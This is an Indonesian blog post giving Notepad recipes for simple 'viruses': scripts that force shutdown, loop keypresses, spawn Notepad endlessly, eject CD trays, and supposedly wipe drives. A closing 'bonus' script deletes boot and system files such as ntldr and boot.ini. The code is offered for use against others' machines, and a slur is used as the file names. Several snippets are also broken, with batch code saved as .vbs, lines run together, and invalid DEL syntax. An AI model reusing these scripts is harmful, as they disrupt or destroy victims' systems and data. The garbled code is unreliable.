Posted by : Rijalul Hilmi Selasa, 03 Februari 2015

Cara Membuat Virus Komputer Dasar Dengan Notepad
1. Virus Untuk Membuat Komputer Shutdown 
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
[+] Lalu Save As beri nama homo1.vbs dan jangan lupa pilih jenis File (All Files)

2. Virus Untuk Membuat Komputer Shutdown Dengan Timer 
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo shutdown -s -t 2 -f 
[+] Angka 2 adalah timernya silahkan ganti sesuka lu bray
[+] Lalu Save As beri nama homo2.vbs dan jangan lupa pilih jenis File (All Files)

3. Virus Untuk Membuat Tombol Backspace Menekan Terus-Menerus  "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
MsgBox "Balik Lagi Bos!"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
[+] Lalu Save As beri nama homo3.vbs dan jangan lupa pilih jenis File (All Files)

4. Virus Untuk Membuat Notepad Terbuka Secara Otomatis  "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
[+] Lalu Save As beri nama homo4.vbs dan jangan lupa pilih jenis File (All Files)

5. Virus Untuk Membuat DVD/CD ROOM terbuka sendiri "sudah saya coba"

[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
[+] Lalu Save As beri nama homo5.vbs dan jangan lupa pilih jenis File (All Files)

6. Virus Untuk Memformat Hardisk
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
DEL C: -Y
DEL D: -Y
[+] Lalu Save As beri nama homo6.vbs dan jangan lupa pilih jenis File (All Files)
[+] Resiko ditanggung pentester gue gak bertanggung jawab!


Bonus Tutorial Membuat Virus Ganas

[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
[+] Lalu Save As beri nama homo1.bat dan jangan lupa pilih jenis File (All Files)
[+] Keterangan Untuk Script Code Diatas
      - del c:\autoexec.bat = buat hapus autoexe.bat di direktori C
      - del c:\boot.ini          =  buat hapus Boot.ini di direktori C
      - del c:\ntldr               = buat hapus ntldr
      - del c:\windows\win.ini  = untuk hapus file win.ini yang berlokasi di C:/windows

      - attrib -r -s -h            =  untuk menampilkan file ke 4 windows tadi yang di supper hidden ...

{ 1 komentar... read them below or add one }

Diberdayakan oleh Blogger.

Pages - Menu

About Me

Rijalul Hilmi
Lihat profil lengkapku

Followers

Blogger templates

Blogroll

You can replace this text by going to "Layout" and then "Page Elements" section. Edit " About "

Blogger templates

Blogger templates

Pages

About Me

Rijalul Hilmi
Lihat profil lengkapku

Followers

Popular Posts

Copyright © HACKER -Black Rock Shooter- Powered by Blogger - Designed by Johanes Djogan